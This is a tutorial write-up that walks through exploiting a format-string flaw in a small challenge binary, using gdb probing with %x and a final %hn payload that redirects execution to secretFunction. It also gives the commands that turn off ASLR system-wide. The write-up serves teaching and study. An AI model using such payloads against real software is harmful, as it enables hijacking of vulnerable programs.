Files

Introduction

A redditor on r/ExploitDev asked for help exploiting the following binary.

1#include <stdio.h>
2#include <stdlib.h>
3#include <unistd.h>
4
5int a = 40;
6int b = 60;
7
8void secretFunction(){
9 printf("Code redirected successfully");
10}
11
12int main(){
13 char buf[100];
14 read(0, buf, 100);
15 printf(buf);
16
17 if ( a == 115 && b == 1056){
18 exit(0);
19 }
20 return 0;
21}

For completeness, I compiled the source using the following gcc command.

gcc chal.c -o chal -no-pie -g

The -no-pie flag was my attempt at disabling ASLR, but I learned that the stack is still randomized even if the binary is compiled with -no-pie; the flag only fixes the load address of the executable itself. To actually disable stack randomization, one must either run the binary in gdb, which turns off randomization for the debugged process by default, or run echo 0 | sudo tee /proc/sys/kernel/randomize_va_space. Note that the latter command applies to all new processes launched on the system and may have serious security implications. To enable randomization again, run echo 2 | sudo tee /proc/sys/kernel/randomize_va_space or reboot your machine. Since this is just a tutorial post, I opted for the former method and tested my exploit in gdb.

Vulnerability

On line 14, there is a read from STDIN into a buffer on the stack. On line 15, this buffer is printed to STDOUT. Unfortunately, the read is limited to 100 bytes, the size of the buffer, so we cannot overflow it. That said, we control the entire format string passed into printf, so we can take advantage of this to read and modify stack memory. I thought the check on line 17 would have some significance, but could not find any use for it.

printf is a variadic function, which means it takes a variable number of arguments. The number of arguments it reads depends on the format string. For example, printf("%x %x %x") expects three arguments whereas printf("pwn") expects none. Since we control the format string, we can force printf to interact with arguments that the program author never passed.

Triggering the Vulnerability

First of all, let's make sure we understand what's going on. Although it is more fun to just begin writing exploits, taking the time to validate your assumptions can be very worthwhile. To start, I compiled a simple program in Compiler Explorer to see how printf receives its arguments.

An image depicting the assembly generated for a printf call.

We can see here that variadic functions like printf follow the same System V x86_64 calling convention as other functions. The format string is passed in rdi. The next five arguments are passed in rsi, rdx, rcx, r8, and r9 respectively. Any arguments after that are pushed onto the stack in reverse order, so that they sit on the stack in ascending order, starting just above the return address.
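To make that mapping concrete, here is a minimal sketch in C of where the n-th argument after the format string lives when printf is entered. It assumes integer or pointer arguments only (floating-point values travel in xmm registers instead), and the helper names vararg_register and vararg_stack_offset are made up for this post.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helpers, not part of any library. n counts the arguments
 * after the format string, so n = 1 is what the first %x prints.
 * Integer and pointer arguments only. */

/* Register holding argument n, or NULL once arguments spill to the stack. */
const char *vararg_register(int n) {
    static const char *regs[] = { "rsi", "rdx", "rcx", "r8", "r9" };
    assert(n >= 1);
    return n <= 5 ? regs[n - 1] : NULL;
}

/* Byte offset of argument n from rsp at the first instruction of printf,
 * or -1 if it is passed in a register. rsp + 0 holds the return address,
 * so the first stack argument (n = 6) sits at rsp + 8. */
long vararg_stack_offset(int n) {
    assert(n >= 1);
    return n <= 5 ? -1 : 8L * (n - 5);
}
```

For instance, vararg_stack_offset(8) is 24, so with rsp at 0x7fffffffdd68 the eighth argument would be read from 0x7fffffffdd80.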

To validate this, I sent the binary %x %x %x %x %x %x %x %x %x %x and compared the output with data collected in gdb. I am using the pwndbg extension for gdb, but even without it, i r will print the values of all the registers and x/6gx $rsp will print the top 6 values on the stack. I set a breakpoint at printf to collect this data.

> i r

rax            0x0                 0
rbx            0x7fffffffdef8      140737488346872
rcx            0x7ffff7ec019d      140737352827293
rdx            0x64                100
rsi            0x7fffffffdd70      140737488346480
rdi            0x7fffffffdd70      140737488346480
rbp            0x7fffffffdde0      0x7fffffffdde0
rsp            0x7fffffffdd68      0x7fffffffdd68
r8             0x0                 0
r9             0x7ffff7fcf680      140737353938560
r10            0x7ffff7ddf5f8      140737351906808
r11            0x7ffff7e1a5b0      140737352148400
r12            0x0                 0
r13            0x7fffffffdf08      140737488346888
r14            0x403e00            4210176
r15            0x7ffff7ffd020      140737354125344
rip            0x7ffff7e1a5b0      0x7ffff7e1a5b0 <__printf>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0

> x/6gx $rsp

0x7fffffffdd68:	0x0000000000401190	0x7825207825207825
0x7fffffffdd78:	0x2520782520782520	0x2078252078252078
0x7fffffffdd88:	0x00000a7825207825	0x0000000000000000

output

ffffdd70 64 f7ec019d 0 f7fcf680 25207825 20782520 78252078 25207825 0

This is what we expect to see. Note that %x displays a 32 bit integer and registers are 64 bits wide on this system. As a result, the output shows only the lower 32 bits of each register and stack value. The first five output values correspond to rsi, rdx, rcx, r8, r9. The first value on the stack (0x401190) is the return address, which printf does not treat as an argument. The next five output values are the lower halves of the stack values that follow the return address, which are the bytes of our own format string.
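The truncation can be checked with a small sketch. The helper name format_as_percent_x is made up for this post; it simply formats the low 32 bits of a 64-bit value the way %x would display them.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: format the low 32 bits of a 64-bit value the way
 * %x would show it. Returns the number of characters written. */
int format_as_percent_x(uint64_t value, char *out, size_t cap) {
    assert(out != NULL && cap >= 9);  /* up to 8 hex digits plus the NUL */
    return snprintf(out, cap, "%x", (unsigned int)(value & 0xffffffffu));
}
```

Feeding it rsi (0x7fffffffdd70) gives ffffdd70, and feeding it the first stack value after the return address (0x7825207825207825) gives 25207825, matching the first and sixth values in the output above.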

Exploit

printf has a %n conversion specifier that writes the number of characters output so far, up to the %n, through a pointer argument. For example, printf("aaaa%n bbbb", &length) would set the value of length to 4. We can use this to modify stack memory and call secretFunction. The memory address %n writes to is passed to printf as an argument. We control a buffer on the stack, so if we can get printf to read our data on the stack and interpret it as an argument, we can force printf to write values at an address we control.
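Here is a minimal sketch of %n and its two-byte sibling %hn in ordinary, non-malicious use. The function names are made up for this post, and the sketch assumes a libc that honors %n for constant format strings, as glibc does; some hardened platforms disable it.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical demo: returns the count stored by %n, which is the number
 * of characters produced before the %n directive. */
int count_written_by_n(void) {
    char out[32];
    int length = -1;
    int written = snprintf(out, sizeof out, "aaaa%n bbbb", &length);
    assert(written >= 0);
    return length;
}

/* Same idea with %hn, which stores through a short pointer and therefore
 * touches only two bytes of memory. */
short count_written_by_hn(void) {
    char out[32];
    short length = -1;
    int written = snprintf(out, sizeof out, "aaaaaa%hn", &length);
    assert(written >= 0);
    return length;
}
```

count_written_by_n() returns 4 because four characters precede the %n, and count_written_by_hn() returns 6 for the same reason.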

In gdb, p/x secretFunction revealed that secretFunction was located at 0x401146. With a plain %n, we would need to print 0x401146 = 4198726 bytes to overwrite the return address on the stack so that it points to secretFunction. This is a lot of bytes to write to STDOUT, so we can be a bit more clever about this. We can use %hn instead of %n to write a short (2 byte) value instead of a 4 byte integer. The return address already on the stack, 0x401190, shares its upper bytes with 0x401146, so only the lower two bytes need to change. Using this trick, we only have to generate a string of length 0x1146 = 4422 bytes. From dumping the stack in the Triggering the Vulnerability section, we know that the return address is located at 0x7fffffffdd68.
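The arithmetic behind the partial overwrite can be written down as a short sketch. The helper names low16 and patch_low16 are made up for this post; the numbers are the ones from the gdb session above.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: the value a %hn write has to store, i.e. the low
 * 16 bits of the target address. */
uint16_t low16(uint64_t addr) {
    return (uint16_t)(addr & 0xffffu);
}

/* Result of overwriting only the low two bytes of a saved return address.
 * On a little-endian machine those are the first two bytes in memory. */
uint64_t patch_low16(uint64_t saved, uint16_t value) {
    return (saved & ~(uint64_t)0xffff) | value;
}

/* Worked example with the numbers from this post. */
void check_post_numbers(void) {
    assert(low16(0x401146) == 0x1146);                  /* 4422 in decimal */
    assert(patch_low16(0x401190, 0x1146) == 0x401146);  /* secretFunction */
}
```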

There is one last trick that makes our exploit easier to write. We can numerically select the argument we want to use with the format string. For example, printf("%3$x", 1, 2, 3) -> 3. Using all the tricks we know of so far, we speculate that our exploit will be of the form %0<num>x.%<arg>$hn<pad><return_addr_pointer>. The first part sets up the string length to be the value we want to write, the second part does the writing through argument number <arg>, and the third ensures the data is written at an address we specify. We can experiment with this until we get the offsets right. First, I'm going to replace $hn with $16jx to be able to see what address we would be writing at (the j length modifier makes printf show the full 64-bit value). We know that num will have to be around 4422, so we will start there. For now, we can use an easy-to-identify return address location such as AAAAAAAABBBBBBBB. I added in an extra set of Bs so that we can detect any offset into the return address location. For example, if we see AAAAAABB, then we know that we need to shift everything by two bytes to operate on the address that we specify. I also added dots as delimiters so that we can easily identify the value and size of all of the components of this exploit. From there, I just used trial and error.

> %04422x.%8$16jx.AAAAAAAABBBBBBBB

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a8bdaf10.4141414141414141.AAAAAAAABBBBBBBB

That's a lot of output, but we see that the value selected by %8$16jx is 0x4141414141414141, the AAAAAAAA part of our input, so argument 8 lines up exactly with data we control. Next, we compute the length of everything printed before the point where %8$hn would go (including the dot). This length is 4423, which is one more than the value we want to write. To correct this, we just need to decrease <num> by 1. For our final exploit, we replace %8$16jx with %8$hn. Since the latter is 2 characters shorter than the former, we add two padding dots after it so that the address stays at the same offset. Note that we need to use echo -e to send the raw address bytes to STDIN, which also means that we have to escape the $ inside the double quotes. Finally, we need to make sure that the address is sent in little endian format. Our final exploit is as follows.

> echo -e "%04421x.%8\$hn...\x68\xdd\xff\xff\xff\x7f\x00\x00" | ./chal

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Segmentation fault (core dumped)

Unfortunately, we get a segmentation fault. This was somewhat confusing to me since we checked everything and made sure all the addresses matched before launching the final exploit. The ulimit -S -c unlimited command enables core dumps on Linux. As a result, a core file will be generated whenever a program crashes. gdb -c core will allow us to inspect the core dump.

A pwndbg screenshot depicting a store of 0x1146 to 0x7fffffffdd68.

If we look at where rip is, we can clearly see that the segmentation fault happened while trying to store 0x1146 at 0x7fffffffdd68. This is exactly what we wanted to happen, so why is it crashing? Looking at the STACK section, we can see that the stack is mapped at a different address. This is the kernel's ASLR at work, and it takes effect even if the binary is not compiled as a position independent executable. Hence, I ran the exploit in gdb to ensure the stack was where we expected it to be. We could have also turned off kernel stack randomization as described at the top of this post, but I did not want to turn it off and forget to turn it back on.

> echo -e "%04421x.%8\$hn...\x68\xdd\xff\xff\xff\x7f\x00\x00" > pwn.txt

> gdb ./chal -ex "b secretFunction" -ex "r <pwn.txt"

We can see here that secretFunction is indeed executed. Our exploit works! There are few satisfactions in life as good as watching a tweetable exploit hijack a binary. If you followed this tutorial up until now, I hope it was worth your while and you learned some cool tricks.
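For readers who would rather generate the payload programmatically than with echo -e, here is a minimal sketch in C. The name build_payload and the fixed 16-byte prefix are assumptions made for this post; the 16 bytes are what place the address at argument 8 in the layout worked out above. Unlike echo, this sketch does not append a trailing newline.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREFIX_LEN 16  /* bytes before the address; makes it argument 8 */

/* Hypothetical helper: assemble "%0<num>x.%8$hn" padded with dots to
 * PREFIX_LEN bytes, followed by the 8-byte little-endian address to
 * write to. Returns the payload length, or 0 if it does not fit. */
size_t build_payload(unsigned char *out, size_t cap,
                     uint64_t write_addr, unsigned value) {
    char directive[PREFIX_LEN + 1];
    int n;

    /* %x can print up to 8 hex digits, so the width only controls the
     * character count if it is at least 8. */
    assert(out != NULL && value > 8);

    /* value - 1 zero-padded characters plus the dot print `value` bytes. */
    n = snprintf(directive, sizeof directive, "%%0%ux.%%8$hn", value - 1);
    if (n < 0 || n > PREFIX_LEN || cap < (size_t)(PREFIX_LEN + 8))
        return 0;

    memset(out, '.', PREFIX_LEN);          /* padding goes after the %hn */
    memcpy(out, directive, (size_t)n);
    for (int i = 0; i < 8; i++)            /* little endian: low byte first */
        out[PREFIX_LEN + i] = (unsigned char)(write_addr >> (8 * i));
    return (size_t)(PREFIX_LEN + 8);
}
```

Calling build_payload(buf, sizeof buf, 0x7fffffffdd68, 0x1146) and writing the returned number of bytes with fwrite produces the same 24 bytes as the echo command, minus the newline.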

Pitfalls

Apart from the stack randomization, the only other catch that gave me some trouble was putting the address at the beginning of the exploit. I thought it would be smart to put the write address first so that its offset would not change as I modified the rest of the exploit. In other words, if the exploit was of the form \x68\xdd\xff\xff\xff\x7f\x00\x00%<num>x.%8$hn, I could modify the latter part of the exploit without changing the offset to the address. However, this failed since the address contains null bytes. printf stopped processing the format string as soon as it hit the first null byte, so the rest of the exploit was never processed. As a result, the address had to be moved to the end.
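The effect of the null bytes can be shown with a small sketch. The helper name bytes_seen_as_string is made up for this post; it reports how many leading bytes of a payload a C-string consumer such as printf will actually look at.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: number of leading bytes of a payload that a
 * C-string consumer such as printf will look at, i.e. everything before
 * the first NUL byte (or all n bytes if there is none). */
size_t bytes_seen_as_string(const unsigned char *payload, size_t n) {
    const unsigned char *nul;
    assert(payload != NULL);
    nul = memchr(payload, 0, n);
    return nul ? (size_t)(nul - payload) : n;
}
```

With the address first, only its six non-null bytes are seen and none of the directives that follow are reached. With the address last, every directive comes before the first null byte, so all of them are processed.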